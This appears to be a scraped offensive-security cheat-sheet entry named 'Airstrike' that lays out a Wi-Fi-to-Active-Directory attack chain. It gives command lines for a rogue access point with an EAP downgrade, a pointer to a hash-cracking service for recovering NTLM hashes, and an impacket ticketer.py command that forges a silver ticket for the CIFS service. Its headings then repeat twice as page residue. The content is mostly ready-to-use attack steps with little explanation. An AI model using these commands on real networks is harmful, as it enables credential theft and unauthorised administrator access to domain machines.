Airstrike

Exploitation steps

Step 1 - Access Point

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap --downgrade <weakest|balanced>

Step 2 - Recovering the NTML hash

https://crack.sh/wpa-enterprise/

Step 3 - Forge a silver ticket for the CIFS service on the device

ticketer.py -nthash <NTLM> -domain-sid <domain_SID> -domain <fqdn_domain> -spn cifs/<fqdn_computer_name> administrator
export KRB5CCNAME=administrator.ccache

Step 4 - Post-Exploitation

Make a Silver ticket with impacket.

Reference

https://shenaniganslabs.io/2021/04/13/Airstrike.html

Exploitation steps​

Step 1 - Access Point​

Step 2 - Recovering the NTML hash​

Step 3 - Forge a silver ticket for the CIFS service on the device​

Step 4 - Post-Exploitation​

Reference​

Exploitation steps

Step 1 - Access Point

Step 2 - Recovering the NTML hash

Step 3 - Forge a silver ticket for the CIFS service on the device

Step 4 - Post-Exploitation

Reference